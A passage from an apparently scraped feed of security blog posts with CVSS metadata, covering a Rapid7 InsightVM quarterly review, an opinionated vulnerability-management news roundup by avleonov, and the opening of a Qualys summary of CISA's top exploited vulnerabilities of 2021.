vulnerability as part of an attack chain that seems to be targeting the industry of her organization. She opens the query builder in InsightVM, constructs a search query to identify the vulnerability by CVE, and discovers several instances. She wants to mention this during her morning all-hands sync so she can recruit other team members to her effort. She exports the vulnerability details page to a PDF, which allows her to share this out and provide more details to interested team members, who then can help her remediate this vulnerability much more quickly.\n\nMoreover, while undertaking this effort, another team member \u2014 Bill \u2014 finds an asset that seems to be a complete tragedy in terms of patching and vulnerability prevalence. He creates the Asset Details report and shares this in an e-mail to his team, stating that this asset seems to be missing their organization's patch cycle. He also suggests that they look for more of these types of assets because he knows that when there is one offender, there are often many.\n\n## Snyk integration for reporting vulnerabilities\n\nContainer Security assessments will now report Ruby vulnerabilities through an integration with the Snyk vulnerability database. This adds RubyGems packages to our Snyk-based coverage, which currently includes vulnerability detections for Java, JavaScript, and Python libraries. This integration is particularly helpful for organizations that perform scanning of Container Images at rest, in both public and private registries.\n\n## Emergent threat coverage recap\n\nQ3 2021 was another busy quarter for high-priority cybersecurity threats. As part of our emergent threat response process, Rapid7's VRM research and engineering teams released vulnerability checks and in-depth technical analysis to help InsightVM customers understand the risk of exploitation and assess their exposure to critical security threats. In July, [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare/rapid7-analysis?referrer=blog>), dubbed \u201c[PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)\" presented remediation challenges for many organizations amid active exploitation of the Windows Print Spooler service. In August, the [ProxyShell](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>) exploit chain put on-premises instances of Microsoft Exchange Server [at risk](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>) for remote code execution. More recently, widespread attacks took advantage of [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>), a critical flaw in[ Confluence Server & Confluence Data Center](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>), to deploy cryptominers, exfiltrate data, and obtain initial access for ransomware operations.\n\nOther notable emergent threats included:\n\n * [ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464)](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464/rapid7-analysis?referrer=blog>)\n * [SolarWinds Serv-U FTP and Managed File Transfer (CVE-2021-35211)](<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>)\n * [Microsoft SAM File Readability (CVE-2021-36934)](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [PetitPotam: Novel Attack Chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)\n * [Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n\n## Stay tuned!\n\nAs always, we're continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and [release notes](<https://docs.rapid7.com/release-notes/insightvm/>) as we continue to highlight the latest in vulnerability management at Rapid7.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-08T13:30:00", "type": "rapid7blog", "title": "What's New in InsightVM: Q3 2021 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-22005", "CVE-2021-26084", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35464", "CVE-2021-36934", "CVE-2021-40539"], "modified": "2021-10-08T13:30:00", "id": "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "href": "https://blog.rapid7.com/2021/10/08/whats-new-in-insightvm-q3-2021-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2022-08-14T16:51:25", "description": "Hello everyone! This is the second episode of Vulnerability Management news and publications. In fact, this is a collection of my posts from the [avleonovcom](<https://t.me/avleonovcom>) and [avleonovrus](<https://t.me/avleonovrus>) telegram channels. Therefore, if you want to read them earlier, subscribe to these channels.\n\n_The main idea of \u200b\u200bthis episode. Microsoft is a biased company. In fact, they should now be perceived as another US agency. Does this mean that we need to forget about Microsoft and stop tracking what they do? No, it doesn't. They do a lot of interesting things that can at least be researched and copied. Does this mean that we need to stop using Microsoft products? In some locations (you know which ones) for sure, in some we can continue to use such products if it is reasonable, but it's necessary to have a plan B. And this does not only apply to Microsoft. So, it's time for a flexible approaches. Here we do it this way, there we do it differently. It seems that rather severe fragmentation of the IT market is a long-term trend and it's necessary to adapt to it._\n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239097>\n\nWhat's in this episode:\n\n 1. Microsoft released a propaganda report, what does this mean for us?\n 2. Microsoft released the Autopatch feature, is it a good idea to use it?\n 3. Ridiculous Vulnerability: Hardcoded Password in Confluence Questions\n 4. The new Nessus Expert and why it's probably Tenable's worst release\n 5. Rapid7 Nexpose/InsightVM features added in Q2 2022: what's good and what's weird\n 6. Palo Alto: Malicious scan 15 minutes after CVE is released. Oh really?\n 7. 6 groups of vulnerabilities that are most often used in attacks, according to Palo Alto, and the end of IT globalization\n\n## Microsoft released a propaganda report, what does this mean for us?\n\nLet's start with the most important topic. Microsoft [released a propaganda report](<https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE50KOK>) about the evil Russians and how they (Microsoft) defend one well-known country. I usually avoid such topics, but in this case, I just can't.\n\n 1. Most of the report is "water" and unproven "highly-likely" stuff. It's boring to read. More than half of the report is not about cyber attacks at all, but about propaganda/disinformation "attacks" in media, social networks, etc. With strange historical digressions. For example, they give a photo of some article from an Indian newspaper of the 1980s and write that this publication was organized by the KGB. I'm not kidding, look at page 12.\n 2. On the other hand, the most important thing in this report is not what is written, but who released it. It's not mainstream media, it's not a government agency like the NSA or CIA, it's Microsoft - a global IT vendor that should, in theory, be more or less neutral. And now they are releasing such reports! If you still believe Microsoft is a non-government commercial company, look through this report. This position is the most official, the foreword was written by the current president of Microsoft.\n 3. From a technical point of view, it is interesting that the state IT infrastructure was transferred to the cloud and Microsoft technologies (Defender for Endpoint?) were used to protect it. Almost all technical information is on the 9th page of the report.\n 4. They write about 2 important security options. The first is that Microsoft made a free Vulnerability Management for them. "The first has been the use of technology acquired from RiskIQ that identifies and maps organizational attack surfaces, including devices that are unpatched against known vulnerabilities and therefore are the most susceptible to attack." It's not entirely clear how they did it. They could just connect hosts to Defender for Endpoint. But perhaps they massively activated the collection of data from hosts in some other way.\n 5. The description of the second protection option hints at the existence of a such non-standard methods: "MSTIC recognized that XXX malware could be mitigated meaningfully by turning on a feature in Microsoft Defender called controlled folder access. This typically would require that IT administrators access devices across their organization, work made more difficult and potentially even dangerous in ZZZ conditions. The YYY government therefore authorized Microsoft through special legal measures to act proactively and remotely to turn on this feature across devices throughout the government and across the country." And here it is not so important that Microsoft set up controlled folder access, it is important how they did it. It turns out that MS can massively remotely tweak security options if the government of a certain country has allowed them to do so. Wow! And what else can they do, on which hosts and under what conditions?\n 6. The main concern, of course, is that Microsoft products, including cloud-based security services, are still widely used in Russian organizations. And not only in Russia, but also in other countries that have some disagreements with US policy. Such publications confirm that Microsoft is a highly biased and unstable IT vendor, and something needs to be done about it quickly.\n\nAnd it would be fair to ask: "Weren't you, Alexander, promoting Microsoft's security services? And now you've turned against them?" ![\ud83e\udd14](https://s.w.org/images/core/emoji/14.0.0/72x72/1f914.png)\n\nAnd it's easy to point to some posts from my blog:\n\n 1. [Microsoft security solutions against ransomware and APT](<https://avleonov.com/2017/12/20/microsoft-security-solutions-against-ransomware-and-apt/>) (the best business breakfast I've ever had - the catering was top notch ![\ud83d\udc4d](https://s.w.org/images/core/emoji/14.0.0/72x72/1f44d.png))\n 2. [Microsoft Defender for Endpoint: Why You May Need It and How to Export Hosts via API in Python](<https://avleonov.com/2021/02/19/microsoft-defender-for-endpoint-why-you-may-need-it-and-how-to-export-hosts-via-api-in-python/>)\n 3. [Getting Hosts from Microsoft Intune MDM using Python](<https://avleonov.com/2021/06/09/getting-hosts-from-microsoft-intune-mdm-using-python/>)\n 4. [How to get Antivirus-related Data from Microsoft Defender for Endpoint using Intune and Graph API](<https://avleonov.com/2021/08/16/how-to-get-antivirus-related-data-from-microsoft-defender-for-endpoint-using-intune-and-graph-api/>)\n 5. [Microsoft Defender for Endpoint: The Latest Versions of Antivirus Engine & Signatures](<https://avleonov.com/2021/09/14/microsoft-defender-for-endpoint-the-latest-versions-of-antivirus-engine-signatures/>)\n\nIt's paradoxical, but I don't have a post about exporting vulnerabilities from Defender for Endpoint. ![\ud83d\ude43](https://s.w.org/images/core/emoji/14.0.0/72x72/1f643.png) I was going to make a post about it, but there were always more important topics. ![\ud83d\ude42](https://s.w.org/images/core/emoji/14.0.0/72x72/1f642.png)\n\nWhat can I say. I still think that Defender for Endpoint is a cool and user-friendly solution. Although sometimes it may be buggy. I also think it's logical to use your OS vendor's security services. Just because you already have complete trust in your OS vendor. Right? \u0410nd other OS vendors should provide security services, as Microsoft does. But the question is what to do if it has become very difficult to trust your OS vendor? To put it mildly.\n\nNot to say that I did not [write about such risks](<https://avleonov.com/2017/12/20/microsoft-security-solutions-against-ransomware-and-apt/>) at all:\n\n"It will be a difficult decision to store this critical data in Microsoft cloud. Even with Microsoft\u2019s guarantees that all the data is stored securely and they touch it with AI only."\n\nBut of course this was not enough. And 5 years ago, things looked very different. \n\u00af_(\u30c4)_/\u00af\n\n## Microsoft released the Autopatch feature, is it a good idea to use it?\n\nContinuing the topic of Microsoft security services. In mid-July, Microsoft [released the Autopatch feature](<https://www.bleepingcomputer.com/news/microsoft/microsoft-windows-autopatch-is-now-generally-available/>) for Windows 10/11 with Enterprise E3 and E5 licenses (not regular, but more expensive licenses). Also [Hybrid Azure Active Directory must be configured](<https://www.theregister.com/2022/07/12/windows_auopatch_live/>). But if everything is purchased and configured properly, then updates for MS products, drivers and other software (in perspective) can be automatically installed from the MS cloud. And it will be more often than once a month. And in the correct way. If you install all updates on all hosts at the same time, there will be a high risk of mass failures. Therefore, patches will be installed gradually. If a failure is detected, the system administrator will be able to react and roll back the problematic patch.\n\n"The 'test ring' contains a minimum number of devices, the 'first ring' roughly 1% of all endpoints in the corporate environment, the 'fast ring' around 9%, and the 'broad ring" the rest of 90% of devices. \nThe updates get deployed progressively, starting with the test ring and moving on to the larger sets of devices after a validation period that allows device performance monitoring and pre-update metrics comparison. \nWindows Autopatch also has built-in Halt and Rollback features that will block updates from being applied to higher test rings or automatically rolled back to help resolve update issues."\n\nIs it convenient? Yes, of course it's convenient. Is it dangerous? Well, it depends on trust in the vendor, faith in vendor's stability and security. Speaking of Microsoft, this can be very controversial for many organizations in many locations. ![\ud83d\ude0f](https://s.w.org/images/core/emoji/14.0.0/72x72/1f60f.png)\n\nBut in general, along with Defender for Endpoint (EDR, VM) and Intune this Autopatch feature looks like a step in the right direction for the OS vendor. At least if we're talking about desktops. If you trust your OS vendor, it makes sense to trust that vendor's services to make life easier for system administrators and security guys. I don't know if vendors of commercial Linux distributions, including Russian ones, are thinking about this, but it seems it makes sense to take such concepts from MS.\n\nOn the other hand, such Autopatch is not a panacea of course. Everything is not so trivial with updating third-party software. But MS seems to have a lot of resources to gradually move in this direction. Vulnerability detection for third-party software in Defender for Endpoint works quite well, which is also not an easy task. Therefore, I think they will be able to update such software in future. If [Qualys can](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-introduces-zero-touch-patching-for-vulnerability-remediation/>), then MS will handle this as well.\n\n## Ridiculous Vulnerability: Hardcoded Password in Confluence Questions\n\nThere has been a lot of news about [Confluence vulnerabilities](<https://confluence.atlassian.com/security/july-2022-atlassian-security-advisories-overview-1142446703.html>) this week. Atlassian has released three of them.\n\n[CVE-2022-26136 & CVE-2022-26137](<https://confluence.atlassian.com/security/multiple-products-security-advisory-cve-2022-26136-cve-2022-26137-1141493031.html>): Multiple Servlet Filter vulnerabilities (Authentication bypass, XSS, Cross-origin resource sharing bypass). Many Atlassian products are vulnerable. Not only Confluence and JIRA, but also Bitbucket for example. Everything is clear here, such installations need to be patched. And, ideally, it's time to stop using Atlassian products if you live and work in certain locations, because this vendor is unstable.\n\n[CVE-2022-26138](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>): Hardcoded password in Confluence Questions. This vulnerability is now the most hyped and ridiculous. If you install the optional Confluence Questions app, this will create a disabledsystemuser user with a hardcoded password. And this user is not disabled! ![\ud83e\udd21](https://s.w.org/images/core/emoji/14.0.0/72x72/1f921.png) The password is already publicly available. If you are logged in as this user, you can read the pages accessible by the confluence-users group. Well, isn't it funny? ![\ud83d\ude42](https://s.w.org/images/core/emoji/14.0.0/72x72/1f642.png) This can be fixed by patching or blocking/deleting the user.\n\nWhat can be said here:\n\n 1. Plugins and extensions are evil and usually the most vulnerable. Try to avoid them.\n 2. This is how backdoors in software can look like. The exploitation is very simple, and the vendor can always say that "oh, sorry, that was a bug".\n 3. Those who make Confluence and similar services available on the network perimeter are their own enemies.\n\n## The new Nessus Expert and why it's probably Tenable's worst release\n\nTenable [introduced Nessus Expert](<https://www.tenable.com/blog/introducing-nessus-expert-now-built-for-the-modern-attack-surface>). They have Nessus Professional, and now there will be Nessus Expert with new features:\n\n 1. [Infrastructure as Code Scanning](<https://youtu.be/Ks5XN0ZpzBw>). In fact, they added [Terrascan](<https://runterrascan.io/>) (acquired this year) to Nessus. So far, it looks very sloppy. This is a separate independent tab in the menu and scan results cannot be viewed in the GUI and can only be downloaded as Json file.\n 2. [External attack surface scanning](<https://youtu.be/_TYvN_GS-AA>). They took these features from [Bit Discovery](<https://www.whitehatsec.com/bit-discovery/>) (also acquired this year). You can run a scan that will look for subdomains for a domain. But only for 5 domains per quarter. If you want more, you need to pay extra. Not to say that this is some kind of exclusive feature. The results can be viewed in the GUI. But that's all. There is no synergy with the usual functionality of Nessus.\n\nThe press release recalls how [Renaud Deraison](<https://t.me/avleonovcom/966>) released first Nessus 24 years ago. But under him, and even more so under Ron Gula, there were no such terrible releases with freshly bought functionality, attached to the main product "with blue electrical tape". And such a Frankenstein monster could never be presented as a new product. Sadness and marketing. Let's see if it gets better with time.\n\n## Rapid7 Nexpose/InsightVM features added in Q2 2022: what's good and what's weird\n\nI looked at the new features in [Rapid7 Nexpose/InsightVM added in Q2 2022](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>). Some changes are like "OMG, how did they live without it?!"\n\nThey just added support for CVSS v3 severity in dashboards. CVSS v3 was released in June 2015. CVSS v3 data has been available in NVD since 2017. And now, 5 years after that, Rapid7 decided to take into account these data as well? Well, ok.\n\nOr that they used to have such weird patching dashboards that progress on the Remediation Project was only visible when the patches were applied to all assets. And now it's better: "Yes, this means customers no longer have to wait for all the affected assets to be remediated to see progress". Indeed, better late than never.\n\nRapid7 just added support for AlmaLinux and Rocky Linux. Although stable versions of these distributions appeared more than a year ago and are already actively used in enterprise businesses as a replacement for CentOS. It turns out that Rapid7 clients have just now got the opportunity to scan these distributions.\n\nRapid7 use the term "recurring coverage" for supported software products. And they have a [public list of such products](<https://docs.rapid7.com/insightvm/recurring-vulnerability-coverage/>). "The following software list encompasses those products and services that we are specifically committed to providing ongoing, automated coverage". The list is not very big, but it's cool that it's public.\n\nOn the other hand, there are cool features. At least one, [Scan Assistant](<https://docs.rapid7.com/insightvm/scan-assistant/>). This feature was introduced in December last year, but now it has been improved. This is an agent that does not collect or analyze data, but is only needed for authentication. It solves the problems of using system accounts for scanning, which can be very risky if the scanner host or one of the targets is compromised. This way you can install Scan Assistant on hosts and Vulnerability Scanner will authenticate to hosts using certificates rather than real system accounts.\n\n"Scan Assistant, a lightweight service deployed on an asset that uses digital certificates for handshake instead of account-based credentials; This alleviates the credential management headaches VM teams often encounter."\n\nThis is a cool and useful feature. As far as I know, other VM vendors do not have this. In Q2, Rapid7 added some automation for updating this Scan Assistant and rotating certificates. It's cool that the functionality is evolving. But for now, it's only for Windows.\n\nAnd there are updates that did not cause any special emotions in me. These are, for example, Asset correlation for Citrix VDI instances and vulnerability detection for Oracle E-Business Suite and VMware Horizon. They added and it's good.\n\n## **Palo Alto: Malicious scan 15 minutes after CVE is released. Oh really?**\n\nThe ["Palo Alto 2022 Unit 42 Incident Response Report" makes the amusing claim](<https://unit42.paloaltonetworks.com/incident-response-report/>) that attackers typically start scanning organizations' perimeters for vulnerabilities 15 minutes after a CVE is published.\n\nJust like this:\n\n"The 2021 Attack Surface Management Threat Report found that attackers typically start scanning for vulnerabilities within 15 minutes of a CVE being announced."\n\nThey do not write how exactly they got these 15 minutes. Or I didn't find it. But apparently they could detect attempts to exploit some specific vulnerabilities. They could use honeypots or IDS for this. And then they could get the difference between the timestamp for exploitaition and the timestamp for vulnerability publication.\n\n[There is an example](<https://unit42.paloaltonetworks.com/cve-2022-1388/>) that 5 days after some vulnerability was published, they released a detection signature. And in 10 hours, they collected two and a half thousand attempts to exploit this vulnerability.\n\n"For example, Palo Alto Networks released a Threat Prevention signature for the F5 BIG-IP Authentication Bypass Vulnerability (CVE-2022-1388), and within just 10 hours, the signature triggered 2,552 times due to vulnerability scanning and active exploitation attempts".\n\nIt's cool of course. But still, the signature was not released immediately. Therefore, it is difficult to say exactly when the malicious scans began.\n\nBut that's not the point. It is not so important whether the scans really start after 15 minutes or some time later. The fact is that attackers monitor the news flow about vulnerabilities. And the fact that they are motivated to scan your perimeter more often than you. And they are motivated to use non-standard checks for this. Not just the ones in your commercial vulnerability scanner.\n\nTherefore, there are only two options. You can compete in speed with attackers. Or you may know and control your perimeter far better than any outside researcher can. This means that you must understand why a particular service is needed on the perimeter. And whenever possible, try to minimize the number of such services as much as possible. For such services, you should specifically monitor security bulletins and start responding even before detection checks appear in vulnerability scanners. And of course before the media starts screaming about this vulnerability.\n\nOf course, it's easier said than done.\n\n## 6 groups of vulnerabilities that are most often used in attacks, according to Palo Alto, and the end of IT globalization\n\nIn the same "[Palo Alto 2022 Unit 42 Incident Response Report](<https://unit42.paloaltonetworks.com/incident-response-report/>)" there is one more interesting point. Groups of vulnerabilities that were most often used in attacks. "For cases where responders positively identified the vulnerability exploited by the threat actor, more than 87% of them fell into one of six CVE categories.".\n\nCVE categories:\n\n * 55% Microsoft Exchange ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)\n * 14% Log4j\n * 7% SonicWall CVEs\n * 5% Microsoft Exchange ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065)\n * 4% Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)\n * 3% Fortinet CVEs\n * 13% Other\n\nOn the one hand, this can be used to prioritize vulnerabilities. And also to identify software and software groups that need special monitoring. I would also like to look at the vulnerabilities in the Other category. But unfortunately they are not included in the report.\n\nOn the other hand, it shows how all these vulnerabilities and incidents depend on a particular region. Well of course Microsoft Exchange is used everywhere. Log4j has also affected almost every organization in one way or another. Perhaps in our region, I mean in Russia, some organizations use Fortinet. But SonicWall and Zoho look absolutely exotic. And in those locations where Unit 42 solves incident response cases, these are very important vendors and products.\n\nOr we can remember [last year's story with Kaseya VSA](<https://avleonov.com/2021/07/05/last-weeks-security-news-printnightmare-kaseya-intune-metasploit-docker-escape/>). Thousands of companies have been affected by the ransomware. But again, it was not in our region and therefore it was not particularly interesting for us.\n\nTaking into account the exodus of Western vendors from the Russian IT market, the landscapes "here" and "there" will differ more and more. More and more incidents in Russia, will occur due to vulnerabilities in our local software. In software that Western information security vendors may never have heard of. BTW, have you heard about [1C](<https://en.wikipedia.org/wiki/1C_Company>) ([Odin-Ass](<https://pikabu.ru/story/rossiyskiy_ryinok_programmnogo_obespecheniya_takoy_strannyiy_3895019>) ![\ud83d\ude05](https://s.w.org/images/core/emoji/14.0.0/72x72/1f605.png))? And it works both ways. Does this mean that in Russia, we will need Vulnerability Management solutions focused on our Russian IT realities? Well apparently yes. And something tells me that this will not only happen in Russia.\n\nIt seems that the time of total globalization in IT is running out. And the ability of VM vendors to relatively easily take positions in new regions is also disappearing. The great fragmentation is coming. But it will be even more interesting that way. ![\ud83d\ude09](https://s.w.org/images/core/emoji/14.0.0/72x72/1f609.png)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-14T11:30:44", "type": "avleonov", "title": "Vulnerability Management news and publications #2", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2022-1388", "CVE-2022-26136", "CVE-2022-26137", "CVE-2022-26138"], "modified": "2022-08-14T11:30:44", "id": "AVLEONOV:4E65E4AC928647D5E246B06B953BBC6F", "href": "https://avleonov.com/2022/08/14/vulnerability-management-news-and-publications-2/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-05-11T05:29:14", "description": "_The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report\u2019s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment._\n\nThe Cybersecurity & Infrastructure Security Agency (CISA) releases [detailed alerts](<https://www.cisa.gov/uscert/ncas/alerts>) of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights into the type, nature, and vendor product affected, as well as recommended mitigations that enterprise IT/security professionals can take to reduce their risk.\n\nTo that end, CISA has released its [2021 Top Routinely Exploited Vulnerabilities Report](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>). It provides in-depth details of each exploited CVE, including which threat actors aggressively targeted both public and private sector organizations worldwide. It also provides mitigation guidance for all the top vulnerabilities.\n\nOf special interest in the report is this key finding by CISA:\n\n_Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors._\n\n### CISA\u2019s Top 15 Routinely Exploited Vulnerabilities of 2021\n\nThe top 15 routine vulnerability exploits observed by cybersecurity authorities in the U.S., Australia, Canada, New Zealand, and the U.K. are:\n\nCVE| Vulnerability Name| Vendor and Product| Type \n---|---|---|--- \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)| [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>) | Apache Log4j| Remote code execution (RCE) \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)| | Zoho ManageEngine AD SelfService Plus| RCE \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)| ProxyShell| Microsoft Exchange Server| Elevation of privilege \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)| ProxyShell| Microsoft Exchange Server| RCE \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)| ProxyShell| Microsoft Exchange Server| Security feature bypass \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)| | Atlassian Confluence Server and Data Center| Arbitrary code execution \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)| | VMware vSphere Client| RCE \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)| [ZeroLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2020/09/15/microsoft-netlogon-vulnerability-cve-2020-1472-zerologon-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Netlogon Remote Protocol (MS-NRPC)| Elevation of privilege \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)| | Microsoft Exchange Server| RCE \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)| | Pulse Secure Pulse Connect Secure| Arbitrary file reading \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)| | Fortinet FortiOS and FortiProxy| Path traversal \n \n### Highlights of Top Vulnerabilities Cited in CISA 2021 Report\n\nBased on the analysis of this report by the Qualys Research Team, let\u2019s review a few of the top vulnerabilities on the 2021 list and our recommendations for how Qualys enterprise customers can detect and respond to them.\n\n#### Log4Shell Vulnerability\n\nThe Log4Shell vulnerability **(CVE-2021-44228)** was disclosed in December 2021. It was widely exploited by sending a specially crafted code string, which allowed an attacker to execute arbitrary Java code on the server and take complete control of the system. Thousands of products used Log4Shell and were vulnerable to the Log4Shell exploitation.\n\nVisit the [Qualys Log4Shell website](<https://www.qualys.com/log4shell-cve-2021-44228/>) for full details on our response to this threat.\n\n### ProxyShell: Multiple Vulnerabilities\n\nThe multiple vulnerabilities called ProxyShell **(CVE-2021-34523, CVE-2021-34473, CVE-2021-31207)** affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., via "vulnerability chaining") enables a remote actor to execute arbitrary code and privilege escalation.\n\n### ProxyLogon: Multiple Vulnerabilities\n\nThe multiple vulnerabilities named ProxyLogon **(CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065)** also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination allows an unauthenticated threat actor to execute arbitrary code on vulnerable Exchange Servers, which enables the attacker to gain persistent access to files, mailboxes, and credentials stored on the servers.\n\n[Read our blog](<https://blog.qualys.com/product-tech/2021/03/10/security-advisory-mitigating-the-risk-of-microsoft-exchange-zero-day-proxylogon-vulnerabilities>) on this threat.\n\n#### Confluence Server and Data Center Vulnerability\n\nAn Object Graph Navigation Library injection vulnerability **(CVE-2021-26084)** exists in Confluence Server that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\n#### Top Vulnerabilities of 2020 Persist\n\nThree additional vulnerabilities **(CVE-2020-1472, CVE-2018-13379, CVE-2019-11510)** were part of the routinely exploited [top vulnerabilities 